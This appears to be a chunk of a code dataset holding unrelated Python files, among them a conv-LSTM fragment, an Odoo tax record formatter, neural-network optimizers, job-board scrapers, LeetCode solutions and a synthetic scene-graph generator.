bsize, _, height, width = x.size()\n (h, c) = getattr(self, name).init_hidden(batch_size=bsize, hidden=self.hidden_channels[i],\n shape=(height, width))\n internal_state.append((h, c))\n\n # Do forward\n (h, c) = internal_state[i]\n x, new_c = getattr(self, name)(x, h, c)\n internal_state[i] = (x, new_c)\n\n x_output = self.cnn_after_lstm(x)\n\n phi_t = torch.sign(phi_0 + self.gamma * self.cnn_meas(x_output))\n # phi_t = f.normalize(phi_t, p=2, dim=1)\n\n output_seq[:, step, :] = x_output.squeeze(1)\n\n return output_seq, (x, new_c)\n\n\n def smoothclamp(self, x, mi, mx):\n return mi + (mx-mi)*(lambda t: torch.where(t < 0 , torch.cuda.FloatTensor(t.size()).fill_(0), torch.where( t <= 1 , 3*t**2-2*t**3, torch.cuda.FloatTensor(t.size()).fill_(1))))((x-mi)/(mx-mi))\n\n\n def clampoid(self, x, mi, mx):\n return mi + (mx-mi)*(lambda t: 0.5*(1+200**(-t+0.5))**(-1) + 0.5*torch.where(t < 0 , torch.cuda.FloatTensor(t.size()).fill_(0), torch.where( t <= 1 , 3*t**2-2*t**3, torch.cuda.FloatTensor(t.size()).fill_(1) ) ) )( (x-mi)/(mx-mi) )\n\n","sub_path":"conv_LSTM_adaptive_128.py","file_name":"conv_LSTM_adaptive_128.py","file_ext":"py","file_size_in_byte":6659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"64849118","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# #\n# odoo, Open Source Management Solution #\n# ### PROOSOFT CLOUD ### #\n# --2018-- #\n# #\n##############################################################################\n\n\nimport re\nfrom odoo.tools.translate import _\n\nTRANS=[\n (u'é','e'),\n (u'è','e'),\n (u'à','a'),\n (u'ê','e'),\n (u'î','i'),\n (u'ï','i'),\n (u'â','a'),\n (u'ä','a'),\n]\n\nclass record:\n def __init__(self, global_context_dict):\n for i in global_context_dict:\n global_context_dict[i] = global_context_dict[i] \\\n and tr(global_context_dict[i])\n self.fields = []\n self.global_values = global_context_dict\n self.pre = {\n 'padding': '',\n 'seg_num1': '01',\n 'seg_num2': '02',\n 'seg_num3': '03',\n 'seg_num4': '04',\n 'seg_num5': '05',\n 'flag': '0',\n 'zero4': ' '\n }\n self.post={'date_value_hdr': '000000', 'type_paiement': '0'}\n self.init_local_context()\n\n def init_local_context(self):\n \"\"\"\n Must instanciate a fields list, field = (name,size)\n and update a local_values dict.\n \"\"\"\n raise _('not implemented')\n\n def generate(self):\n res=''\n for field in self.fields :\n if self.pre.has_key(field[0]):\n value = self.pre[field[0]]\n elif self.global_values.has_key(field[0]):\n value = self.global_values[field[0]]\n elif self.post.has_key(field[0]):\n value = self.post[field[0]]\n else :\n pass\n try:\n res = res + c_ljust(value, field[1])\n except :\n pass\n return res\n\nclass record_df(record):\n def init_local_context(self):\n self.fields=[\n ('df', 2),\n ('vat', 7),\n ('vat_id', 1),\n ('vat_cat', 1),\n ('vat_num', 3),\n ('fiscal_year', 4),\n ('period', 2),\n\n ('order_num', 6),\n ('certificate', 30),\n ('vat_order', 13),\n\n ('vat_order_date', 8),\n ('partner_vat', 13),\n ('partner', 40),\n ('invoice', 30),\n ('invoice_date', 8),\n ('amount_ht', 15),\n ('tax_amount', 15),\n ('start', 1),\n ('subject', 320),\n ('end', 2),\n ('newline', 1)\n ]\n self.pre.update( {\n 'newline': '\\r\\n',\n })\n\nclass record_ef(record):\n def init_local_context(self):\n self.fields=[\n ('ef', 2),\n ('vat', 7),\n ('vat_id', 1),\n ('vat_cat', 1),\n ('vat_num', 3),\n ('fiscal_year', 4),\n ('period', 2),\n\n ('company', 40),\n ('activity', 40),\n 
('city', 40),\n ('street', 72),\n ('num', 4),\n ('zip', 4),\n ('newline', 1)\n ]\n self.pre.update( {\n 'newline': '\\r\\n',\n })\n\nclass record_tf(record):\n def init_local_context(self):\n self.fields=[\n ('tf', 2),\n ('vat', 7),\n ('vat_id', 1),\n ('vat_cat', 1),\n ('vat_num', 3),\n ('fiscal_year', 4),\n ('period', 2),\n\n ('num_invoice', 6),\n ('reserved1', 142),\n ('total_ht', 15),\n ('total_tax', 15),\n ('newline', 1)\n ]\n self.pre.update( {\n 'newline': '\\r\\n',\n })\n\ndef tr(string_in):\n try:\n string_in= string_in.decode('utf-8')\n except:\n # If exception => then just take the string as is\n pass\n for k in TRANS:\n string_in = string_in.replace(k[0],k[1])\n try:\n res= string_in.encode('ascii','replace')\n except:\n res = string_in\n return res\n\n\n\n\n\n\n\ndef c_ljust(s, size):\n \"\"\"\n check before calling ljust\n \"\"\"\n s= s or ''\n if len(s) > size:\n s= s[:size]\n s = s.decode('utf-8').encode('latin1','replace').ljust(size)\n return s\n","sub_path":"wct_tn_accounting_11/models/purchase_record_set.py","file_name":"purchase_record_set.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"157762218","text":"from scheduling import get_schedule as gready_schedule\n\ndef get_time_of_schedule(sch, count_of_machines, count_of_jobs, list_of_weights):\n\ttimes = [0] * count_of_machines\n\tfor i in xrange(count_of_jobs):\n\t\ttimes[sch[i]] += list_of_weights[i]\n\treturn max(times)\n\nclass DFSSchedule:\n\tbest_schedule = None\n\tbest_schedule_time = float('+inf')\n\n\tdef construct_dfs_schedule(self, count_of_machines, count_of_jobs, list_of_weights, current_sch, number_of_job, max_time):\n\t\tif number_of_job == count_of_jobs:\n\t\t\ttime = get_time_of_schedule(current_sch, count_of_machines, count_of_jobs, list_of_weights)\n\t\t\tif time < self.best_schedule_time:\n\t\t\t\tself.best_schedule = current_sch[:]\n\t\t\t\tself.best_schedule_time = time\n\t\telse:\n\t\t\tfor m in xrange(0, count_of_machines):\n\t\t\t\tcurrent_sch[number_of_job] = m\n\t\t\t\tif get_time_of_schedule(current_sch, count_of_machines, number_of_job + 1, list_of_weights) > max_time:\n\t\t\t\t\tcontinue\n\t\t\t\tself.construct_dfs_schedule(count_of_machines, count_of_jobs, list_of_weights, current_sch, number_of_job + 1, max_time)\n\ndef get_schedule(count_of_machines, count_of_jobs, list_of_weights):\n\tsch = gready_schedule(count_of_machines, count_of_jobs, list_of_weights)\n\tb_max = get_time_of_schedule(sch, count_of_machines, count_of_jobs, list_of_weights)\n\tbest_schedule = None\n\tbest_schedule_time = float('+inf')\n\tconstructor = DFSSchedule()\n\tconstructor.construct_dfs_schedule(count_of_machines, count_of_jobs, list_of_weights, [0] * count_of_jobs, 0, b_max)\n\treturn constructor.best_schedule\n\nif __name__ == \"__main__\":\n\tfrom sys import stdin\n\n\tprint(\"Enter count of machines: \")\n\tcount_of_machines = int(stdin.readline())\n\tprint(\"Enter count of jobs: \")\n\tcount_of_jobs = int(stdin.readline())\n\tprint(\"Enter weights of jobs:\")\n\tlist_of_weights = map(lambda x: int(x), stdin.readline().split(' '))\n\t\n\tprint(\" \".join(map(lambda x: str(x), get_schedule(count_of_machines, count_of_jobs, list_of_weights))))","sub_path":"pseudo_accurate.py","file_name":"pseudo_accurate.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"553622110","text":"import numpy as np\nfrom nanograd.tensor 
import Tensor\n\n\nclass Optimizer:\n \"\"\"Base class for optimizers\"\"\"\n def __init__(self, params:list):\n \"\"\"\n Initializer of the Optimizer class\n\n Args:\n params (list of Tensors)\n \"\"\"\n self.params = list(params)\n self.state = []\n \n def step(self):\n \"\"\"Update rule\"\"\"\n raise NotImplementedError(\"Should be implemented in subclasses of Optimizer\")\n\n def reset(self):\n \"\"\"Resets all hyperparameters\"\"\"\n raise NotImplementedError(\"Should be implemented in subclasses of Optimizer\")\n\n def zero_grad(self):\n \"\"\"\n Resets gradients of the parameters \n to zero. \n\n For gradient accumulation, in the training loop, call zero_grad() every\n n (usually 2 or 3) batches\n \"\"\"\n for param in self.params:\n param.grad = None\n\n\nclass SGD(Optimizer):\n \"\"\"Implementation of Stochastic Gradient Descent (SGD)\n \n Args:\n params (list of Tensors): parameters to be updated\n lr (float): learning rate\n momentum (float): Nesterov momentum\n \"\"\"\n def __init__(self, params:list, lr:float=1e-3, momentum:float=0) -> None:\n super(SGD, self).__init__(params)\n assert momentum >= 0.0, \"Momentum can't be negative\"\n\n self.lr, self.momentum = lr, momentum\n self.momentums = [Tensor.zeros(p.shape, device=self.params[0].device) for p in self.params]\n\n def step(self) -> None:\n for i, p in enumerate(self.params):\n self.momentums[i] = self.momentums[i] * self.momentum + self.lr * p.grad\n p.data = (p - self.momentums[i]).data \n\n\nclass Adam(Optimizer):\n \"\"\"Implementation of Adam\n \n Args:\n lr (float): learning rate\n beta1 (float): smoothing factor for first moment of the gradient\n beta2 (float): smoothing factor for second moment of the gradient\n eps (float): avoid division by zero\n \"\"\"\n def __init__(self, params:list, lr:float=1e-3, beta1:float=0.9, \n beta2:float=0.999, eps:float=1e-8) -> None:\n super(Adam, self).__init__(params)\n assert (0 <= beta1) and (beta1 < 1), \"Smoothing factor must be in [0,1)\"\n assert (0 <= beta2) and (beta2 < 1), \"Smoothing factor must be in [0,1)\"\n\n self.lr, self.beta1, self.beta2, self.eps = lr, beta1, beta2, eps\n self.t = 0\n\n self.exp_avg = [Tensor.zeros(p.shape, device=self.params[0].device) for p in self.params]\n self.exp_avg_sq = [Tensor.zeros(p.shape, device=self.params[0].device) for p in self.params]\n \n def step(self) -> None:\n self.t += 1\n\n for i, p in enumerate(self.params):\n self.exp_avg[i] = self.beta1 * self.exp_avg[i] + (1. - self.beta1) * p.grad\n self.exp_avg_sq[i] = self.beta2 * self.exp_avg_sq[i] + (1. - self.beta2) * (p.grad ** 2)\n\n bias_correction1 = self.exp_avg[i] / (1. - (self.beta1 ** self.t)) \n bias_correction2 = self.exp_avg_sq[i] / (1. 
- (self.beta2 ** self.t))\n\n            p.data = (p - self.lr * bias_correction1 / (bias_correction2.sqrt() + self.eps)).data\n\n\nclass AdamW(Optimizer):\n    \"\"\"Implementation of AdamW: Adam with enhanced weight decay\n\n        Args:\n            lr (float): learning rate\n            weight_decay (float): L2-regularization parameter\n            beta1 (float): smoothing factor for first moment of the gradient\n            beta2 (float): smoothing factor for second moment of the gradient\n            eps (float): avoid division by zero\n    \"\"\"\n    def __init__(self, params:list, lr:float=1e-3, weight_decay:float=1e-2, \n                 beta1:float=0.9, beta2:float=0.999, eps:float=1e-8) -> None:\n        super(AdamW, self).__init__(params)\n        assert (0 <= beta1) and (beta1 < 1), \"Smoothing factor must be in [0,1)\"\n        assert (0 <= beta2) and (beta2 < 1), \"Smoothing factor must be in [0,1)\"\n\n        self.lr, self.weight_decay, self.eps = lr, weight_decay, eps\n        self.beta1, self.beta2 = beta1, beta2\n        self.t = 0\n\n        self.exp_avg = [Tensor.zeros(p.shape, device=self.params[0].device) for p in self.params]\n        self.exp_avg_sq = [Tensor.zeros(p.shape, device=self.params[0].device) for p in self.params] \n\n    def step(self):\n        self.t += 1\n\n        for i, p in enumerate(self.params):\n            bias_correction1 = 1 - self.beta1 ** self.t\n            bias_correction2 = 1 - self.beta2 ** self.t\n\n            self.exp_avg[i] = self.beta1 * self.exp_avg[i] + (1. - self.beta1) * p.grad\n            self.exp_avg_sq[i] = self.beta2 * self.exp_avg_sq[i] + (1. - self.beta2) * (p.grad ** 2)\n\n            denom = (self.exp_avg_sq[i] / bias_correction2).sqrt() + self.eps\n            step_size = self.lr / bias_correction1\n\n            p.data = (p * (1 - self.lr * self.weight_decay) - step_size * (self.exp_avg[i] / denom)).data","sub_path":"build/lib/nanograd/optim/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"635498165","text":"\"\"\"Compute dynamic functional connectivity.\n\nRecommended\n-----------\n#PBS -l walltime=6:00:00\n#PBS -N compute_dfc\n#PBS -l nodes=4:ppn=16\npython ~/toolbox/research/DMN-corr/xx_server/compute_dfc.py\n\"\"\"\nimport os\nimport shutil\n\nimport numpy as np\nfrom joblib import Memory\n\nfrom brainpipe.system import Study\nfrom brainpipe.connectivity import dfc, get_pairs\n\nif __name__ == '__main__':\n\n    ###########################################################################\n    cond = ('gamma50-150',)  # trailing comma makes this a 1-tuple, so *cond unpacks the whole label\n    win = 10.\n    overlap = .5\n    measures = ['corr', 'mtd', 'cmi']\n    ###########################################################################\n\n    st = Study('DMN-CORR')\n\n    # Path :\n    amp_files = st.search(*cond, folder='feature/amp', full_path=False)\n    save_to = st.path_to_folder('dfc')\n    suj_conf = st.load_config('DMN_SUBJECTS.json')\n    kw = dict(verbose=False, win_opt='hamming', overlap=overlap)\n\n    # Cache configuration :\n    cache_dir = st.path_to_folder('cache/dfc')\n    memory = Memory(cachedir=cache_dir, verbose=0)\n\n    for f in amp_files:\n        print('--------------------------------------------------------------')\n        print('-> Processing %s' % f)\n        print('--------------------------------------------------------------')\n        suj = f.split('_')[0]\n        sf = suj_conf[suj]['info']['sf']\n        assert sf == 512\n\n        # Load amplitude :\n        print('-> Load file %s' % f)\n        amp = st.load(f, folder='feature/amp')\n        n_chans, n_time, n_sessions = amp.shape\n        pairs = get_pairs(n_chans, as_array=True)\n        n_pairs = pairs.shape[0]\n\n        # Get the number of windows :\n        n_win = len(dfc(amp[0, :, 0], amp[0, :, 0], win, sf=sf, **kw)[0])\n\n        # Define dfc 
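(cached on disk via joblib.Memory, so already-computed pairs are skipped on reruns) 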
function :\n @memory.cache\n def _dfc(meth, i, amp_file):\n print(' * Compute pair %i/%i' % (i + 1, n_pairs), end='\\r')\n r, c = pairs[i, :]\n ts_1, ts_2 = amp[r, ...], amp[c, ...]\n return dfc(ts_1, ts_2, win, sf=sf, axis=0, measure=meth, **kw)\n\n # Loop over dfc methods :\n for m in measures:\n # Save file :\n save_as = f.replace('.npy', '_dfc-%s_win-%ir%i.npz' % (m, win, int(overlap * 100))) # noqa\n full_path = os.path.join(save_to, save_as)\n if os.path.isfile(full_path):\n print('======== %s ALREADY COMPUTED ========' % save_as)\n continue\n print(' -> File will be saved as %s' % save_as)\n\n print(' -> Compute %s dfc measure' % m)\n connect = np.zeros((n_chans, n_chans, n_win, n_sessions), dtype=float) # noqa\n pval = np.zeros_like(connect)\n for i, (r, c) in enumerate(pairs):\n _connect, _pval, time = _dfc(m, i, f)\n connect[r, c, ...] = _connect\n pval[r, c, ...] = _pval\n\n # Save file :\n print(' -> Save file %s' % full_path)\n np.savez(full_path, connect=connect, pval=pval, time=time)\n\n # Remove cache folder :\n print('-> Remove cache folder')\n shutil.rmtree(cache_dir, ignore_errors=True)\n","sub_path":"DMN-corr/_xx_server/compute_dfc.py","file_name":"compute_dfc.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"645333754","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\n\ndef getCareerBlissJobs():\n sock = urllib.request.urlopen(\"https://www.careerbliss.com/search/?q=Healthcare%20Assistant&l=&typeFilter=job&sf=true\")\n htmlSource = sock.read() \n sock.close() \n output = []\n soup = BeautifulSoup(htmlSource) \n nextli = True\n while nextli:\n jobs = soup.find(id='bodyContainer').find(\"div\").find(\"div\").find_all(\"div\")[2].find_all(\"div\")[2].find_all(\"div\")[1].find(\"div\")\n print(jobs)\n return \"Cant access data\"\n\ndef getZippiaJobs():\n sock = urllib.request.urlopen(\"https://www.zippia.com/arizona-city-az-jobs/\")\n htmlSource = sock.read() \n sock.close()\n soup = BeautifulSoup(htmlSource)\n output = []\n jobs = soup.find(\"zp-card-proxy\")\n print(jobs)\n return \"nothing found\"\n\ndef getJobxoomJobs():\n sock = urllib.request.urlopen(\"http://www.jobxoom.com/jobfind.php?action=search&auth_sess=llpvl5oprgnsimc38ugp3mbjk3&ref=34eb2b5cddb8fecdaaa06c6c9&kwd=hea&city=&jids%5B%5D=83#.XiHKicj7Q2w\")\n htmlSource = sock.read() \n sock.close()\n soup = BeautifulSoup(htmlSource)\n jobs = soup.find(id='idjobsearchresults').find_all(\"div\")\n output = []\n nexturl = True\n while nexturl:\n for job in jobs:\n try:\n clas = job[\"class\"]\n if \"results\" in clas:\n h = job.find(\"a\", href=True)[\"href\"]\n j = job.find(\"a\").getText().replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n k = job.find_all(\"p\", attrs={\"class\":\"desc\"})[-1].getText().replace(\"Employer/Recuiter:\",\"\").strip().replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n desc = job.find(\"p\", attrs={\"class\":\"desc1\"}).getText().replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n logo = \"\"\n try:\n state = k.split(\" - \")[1]\n city = k.split(\" - \")[2]\n country = k.split(\" - \")[3]\n k = k.split(\" - \")[0].replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n except:\n state = \"\"\n city = \"\"\n country = \"\"\n k = \"\"\n start = job.find(\"span\", attrs={\"class\":\"posted\"}).getText().replace(\"Posted on: \", \"\").replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n end = \"\"\n output.append({\"link\":h, \"name\":j, \"organization\":k, \"desc\":desc, \"logo\":logo, 
\"country\":country, \"state\":state, \"city\":city, \"start\":start, \"end\":end})\n except Exception as e:\n print(e)\n continue\n nexturl = soup.find_all(\"li\", attrs={\"class\":\"nolist\"})[-1].find(\"a\", href=True)[\"href\"]\n try:\n sock = urllib.request.urlopen(nexturl)\n htmlSource = sock.read() \n sock.close()\n soup = BeautifulSoup(htmlSource)\n jobs = soup.find(id='idjobsearchresults').find_all(\"div\")\n except:\n nexturl = None\n return output\n\n\ndef getJobvertiseJobs():\n sock = urllib.request.urlopen(\"http://www.jobvertise.com/jobs/search?query=care&city=&radius=30&state=AZ&button=Search+Jobs\")\n htmlSource = sock.read() \n sock.close()\n soup = BeautifulSoup(htmlSource)\n output = []\n try:\n jobs = soup.find(\"body\").find_all(\"center\")[15].find(\"table\").find_all(\"table\")\n except:\n jobs = soup.find(\"body\").find_all(\"center\")[16].find(\"table\").find_all(\"table\")\n for job in jobs:\n try:\n j = job.find(\"span\").getText()\n h = job.find(\"a\", href=True)[\"href\"]\n k1 = job.find_all(\"tr\")[0].find_all(\"span\")[2]\n k1 = str(k1).split(\"
    \")\n desc = \"\"\n logo = \"\"\n state = k1[0].split(\" \")[-1]\n city = k1[0].split(\" \")[-2].strip(\",\").split(\">\")[-1]\n k = \"\"\n if \"Company Name:\" not in k1[1]:\n desc = k1[1]\n else:\n desc = \"Position\"+k[1].split(\"Position\")[1]\n k = k1[1].split(\"Position\")[0].replace(\"Company Name:\", \"\")\n country = \"US\"\n start = k1[-1].split(\"<\")[0]\n end = \"\"\n print(h)\n output.append({\"link\":h, \"name\":j, \"organization\":k, \"desc\":desc, \"logo\":logo, \"country\":country, \"state\":state, \"city\":city, \"start\":start, \"end\":end})\n except Exception as e:\n print(e)\n continue\n return output\n","sub_path":"flask-marketplace/marketplace/app/scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204810548","text":"# APPROACH - 1: (MY APPROACH) DIDN'T WORK \n# Time Complexity : O(max(s log s, t log t)) - s is the length of s ad t is the length of t, sort function is used\n# Space Complexity : O(1) as the length of both the hashmaps is constant (max : 26)\n# Did this code successfully run on Leetcode : NO\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. first checked if the length of both strings are equal or not\n# 2. Build two dicts one for s and other for t - to store the count of unique chars\n# 3. Then check whether the length of both dicts are same\n# 4. Then check if the sorted values of both dicts are same\n# 5. PROBLEM: Doesn't preserve the order of letters - eg:- aba, baa which my algo will pass but they are not isomorphic.\n\nclass Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n \n if len(s) == 0 and len(t) == 0:\n return True\n \n elif (not s or not t) or (len(s) != len(t)):\n return False\n \n hash_s = defaultdict(int)\n for char in s:\n hash_s[char] += 1\n \n hash_t = defaultdict(int)\n for char in t:\n hash_t[char] += 1\n \n # Check whether number of unique chars is same or not\n if len(hash_s) != len(hash_t):\n return False\n \n else:\n if list(hash_s.values()).sort() == list(hash_t.values()).sort():\n return True\n \n else:\n return False\n \n \n \n \n \n# APPROACH - 2: CORRECT APPROACH \n# Time Complexity : O(s) or O(t) - s is the length of s ad t is the length of t and to be a valid case to check, s == t.\n# Space Complexity : O(1) as the length of both the hashmaps is constant (max : 26)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. first checked if the length of both strings are equal or not\n# 2. Build two dicts one for s and other for t - to store correspondence (1-1 mappping)\n# 3. Go through two lists and check if char is in hashmap or not -> YES: check if the mapping is same as the current letter of other string -> YES: proceed further\n# -> NO: return False\n# -> NO: create an entry and store the mapping. \n# 4. Do for both the hashmap as we need 1-1 correspondence from both string's side. 
\n \nclass Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n \n if len(s) == 0 and len(t) == 0:\n return True\n \n elif (not s or not t) or (len(s) != len(t)):\n return False\n \n hash_s, hash_t = {}, {}\n for ind in range(len(s)):\n \n if s[ind] in hash_s and hash_s[s[ind]] != t[ind]:\n return False\n \n elif s[ind] not in hash_s:\n hash_s[s[ind]] = t[ind]\n \n \n if t[ind] in hash_t and hash_t[t[ind]] != s[ind]:\n return False\n \n elif t[ind] not in hash_t:\n hash_t[t[ind]] = s[ind]\n \n return True\n \n \n","sub_path":"Problem-2_Isomorphic_string.py","file_name":"Problem-2_Isomorphic_string.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"180509339","text":"import networkx as nx\nimport numpy as np\nimport copy\nimport pickle as pkl\nimport random\nfrom argparse import ArgumentParser\nimport os\n\ndef print_stats(msg,num_nodes,num_edges,degrees,num_components,node_labels,edge_labels):\n global counter\n counter += 1\n print(msg)\n print(\"Nodes info: total = \", np.sum(num_nodes), \", average = \", np.sum(num_nodes) / len(num_nodes),\n \", (min,max) = (\", np.min(num_nodes), np.max(num_nodes), \") variance =\", np.var(num_nodes))\n print(\"Edges info: total = \", np.sum(num_edges), \", average = \", np.sum(num_edges) / len(num_edges),\n \", (min,max) = (\", np.min(num_edges), np.max(num_edges), \") variance =\", np.var(num_edges))\n print(\"degrees info: average = \", np.sum(degrees) / len(degrees),\n \", (min,max) = (\", np.min(degrees), np.max(degrees), \") variance =\", np.var(degrees))\n print(\"Label space info : node_label_space \", len(node_labels), \" edge_label_space \", len(edge_labels))\n #print(\"components info: average = \", np.sum(num_components) / len(num_components), \", (min,max) = (\",\n # np.min(num_components), np.max(num_components), \") variance =\", np.var(num_components))\n return\n\ndef stats_helper(graphs):\n print(\"num graphs = \",len(graphs))\n num_edges = []\n num_nodes = []\n degrees = []\n num_components = []\n node_labels = set()\n edge_labels = set()\n iter = 0\n for g in graphs:\n iter += 1\n #print(iter,len(node_labels))\n num_edges.append(g.number_of_edges())\n num_nodes.append(g.number_of_nodes())\n for u in list(g.nodes):\n degrees.append(g.degree[u])\n node_labels.add(g.nodes[u]['label'])\n for e in list(g.edges):\n edge_labels.add(g[e[0]][e[1]]['label'])\n num_components.append(nx.number_connected_components(g))\n #if iter%30000 == 0:\n # print_stats(iter/30000,num_nodes,num_edges,degrees,num_components,node_labels,edge_labels)\n #print(edge_labels[0:100])\n #print(edge_labels)\n print_stats(\"finish\",num_nodes, num_edges, degrees, num_components,node_labels,edge_labels)\n return\n\n\ndef compute_all_relationships(graph,eps = 0.2):\n directions = {\n \"front\": [0.754490315914154,-0.6563112735748291,-0.0],\n \"below\": [-0.0,-0.0,-1.0],\n \"behind\": [-0.754490315914154,0.6563112735748291,0.0],\n \"left\": [-0.6563112735748291,-0.7544902563095093,0.0],\n \"right\": [0.6563112735748291,0.7544902563095093,-0.0],\n \"above\": [0.0,0.0,1.0]\n }\n name_to_idx = {\n \"front\":0,\n \"behind\":1,\n \"left\":2,\n \"right\":3,\n }\n all_relationships = {}\n for name, direction_vec in directions.items():\n if name == 'above' or name == 'below': continue\n all_relationships[name] = []\n for i in range(graph.number_of_nodes()):\n coords1 = graph.nodes[i]['pos']\n for j in range(graph.number_of_nodes()):\n if j == i:\n continue\n coords2 = 
graph.nodes[j]['pos']\n            diff = [coords2[k] - coords1[k] for k in [0, 1, 2]]\n            dot = sum(diff[k] * direction_vec[k] for k in [0, 1, 2])\n            if dot > eps:\n                if graph.has_edge(i,j):\n                    graph[i][j]['label'][name_to_idx[name]] = 1\n                else:\n                    graph.add_edge(i,j,label = np.zeros(4))\n                    graph[i][j]['label'][name_to_idx[name]] = 1\n\n    return graph\n\ndef corpus_gen(params):\n    colors ={\n        \"gray\": [87, 87, 87],\n        \"red\": [173, 35, 35],\n        \"blue\": [42, 75, 215],\n        \"green\": [29, 105, 20],\n        \"brown\": [129, 74, 25],\n        \"purple\": [129, 38, 192],\n        \"cyan\": [41, 208, 208],\n        \"yellow\": [255, 238, 51]\n    }\n    colors_list = [\"gray\",\"red\",\"blue\",\"green\",\"brown\",\"purple\",\"cyan\",\"yellow\"]\n    query_graphs = []\n    corpus_graphs = []\n    for k in range(0,params['num_queries']):\n        q = nx.Graph()\n        for u in range(0,params['max_query_nodes']):\n            # label is a length-9 feature vector: indices 0-2 one-hot shape, 3-5 RGB color, 6-7 one-hot material, 8 size\n            shape_id = np.random.randint(0,3)\n            material_id = np.random.randint(6,8)\n            size = np.random.randint(0,2)\n            size = 0.35*(1+size)\n            label_ = np.zeros(9)\n            label_[shape_id] = 1\n            label_[material_id] = 1\n            label_[8] = size\n            label_[3:6] = np.asarray(colors[colors_list[np.random.randint(0,len(colors_list))]])/256\n            x = np.random.uniform(-3,3)\n            y = np.random.uniform(-3,3)\n            r = size\n            q.add_node(u,label = label_, pos= (x,y,r))\n        query_graphs.append(compute_all_relationships(q))\n        corpus = []\n        for _ in range(params['pos_corpus_per_query']):\n            c = copy.deepcopy(q)\n            for u in range(0,params['max_corpus_nodes']-params['max_query_nodes']):\n                # label is a length-9 feature vector: indices 0-2 one-hot shape, 3-5 RGB color, 6-7 one-hot material, 8 size\n                shape_id = np.random.randint(0, 3)\n                material_id = np.random.randint(6, 8)\n                size = np.random.randint(0, 2)\n                size = 0.35*(1 + size)\n                label_ = np.zeros(9)\n                label_[shape_id] = 1\n                label_[material_id] = 1\n                label_[8] = size\n                label_[3:6] = np.asarray(colors[colors_list[np.random.randint(0, len(colors_list))]]) / 256\n                x = np.random.uniform(-3, 3)\n                y = np.random.uniform(-3, 3)\n                r = size\n                c.add_node(u+params['max_query_nodes'],label=label_, pos=(x, y, r))\n            c = compute_all_relationships(c)\n            corpus.append(c)\n        corpus_graphs.append(corpus)\n    return query_graphs,corpus_graphs\n\ndef add_noise(x,s):\n    x+=np.random.normal(0,s)\n    x = min(1.0,x)\n    x = max(0,x)\n    return x\n\ndef noisy_corpus(queries,corpus,params):\n    s = params['noise']\n    for q in queries:\n        for u in range(q.number_of_nodes()):\n            label_ = q.nodes[u]['label']\n            label_[3] = add_noise(label_[3],s)\n            label_[4] = add_noise(label_[4],s)\n            label_[5] = add_noise(label_[5],s)\n            label_[8] = add_noise(label_[8],s)\n            q.nodes[u]['label'] = label_\n\n    for corpus_list in corpus:\n        for q in corpus_list:\n            for u in range(q.number_of_nodes()):\n                label_ = q.nodes[u]['label']\n                label_[3] = add_noise(label_[3], s)\n                label_[4] = add_noise(label_[4], s)\n                label_[5] = add_noise(label_[5], s)\n                label_[8] = add_noise(label_[8], s)\n                q.nodes[u]['label'] = label_\n\n    return queries,corpus\n\ndef complete_corpus(params,pos_corpus):\n    corpus = []\n\n    for i in range(params['num_queries']):\n        corpus_list = pos_corpus[i]\n        for j in range(0,params['total_corpus_per_query']-params['pos_corpus_per_query']):\n            q = i\n            while q == i:\n                q = np.random.randint(0,params['num_queries'])\n            k = np.random.randint(0,params['pos_corpus_per_query'])\n            corpus_list.append(pos_corpus[q][k])\n        corpus.append(corpus_list)\n\n    return corpus\n\ndef check(query_graphs,train_corpus,params):\n    
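\"\"\"Sanity-check the generated graphs: node labels must be length-9 vectors with entries in [0,1], edge labels length-4 vectors, and every graph must be connected.\"\"\"\n    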
print(\"Now checking the data\")\n #params, , , test_corpus, validation_corpus, train_labels, test_labels, validation_labels = data\n\n for g in query_graphs:\n if g.number_of_nodes() != params['max_query_nodes']:\n print(\"Error 1\")\n nodes = list(g.nodes)\n #print(nodes)\n if (0 not in nodes) or (1 not in nodes) or (2 not in nodes) or (3 not in nodes) or (4 not in nodes):\n print(\"Error 2\")\n for node in nodes:\n label_ = g.nodes[node]['label']\n if len(label_)!=9:\n print(\"Error 89\")\n for l in label_:\n if l < 0 or l > 1:\n print(\"Error 3\")\n for node2 in nodes:\n if g.has_edge(node,node2):\n label_= g.edges[node,node2]['label']\n if len(label_) != 4:\n print(\"Error 79\")\n for l in label_:\n if l < 0 or l > 1:\n print(\"Error 4\")\n A = nx.to_numpy_matrix(g)\n for u in nodes:\n for v in nodes:\n if g.has_edge(u,v):\n A[u,v] = np.sum(g.edges[u,v]['label'])\n if not nx.is_connected(g):\n print(\"Error disconnected\")\n\n print(\"query graphs are ok\")\n for i in range(len(query_graphs)):\n for g in train_corpus[i]:\n if g.number_of_nodes() != params['max_corpus_nodes']:\n print(\"Error 1\")\n nodes = list(g.nodes)\n for i in range(0,params['max_corpus_nodes']):\n if i not in nodes:\n print(\"Error 2\")\n #if (0 not in nodes) or (1 not in nodes) or (2 not in nodes) or (3 not in nodes) or 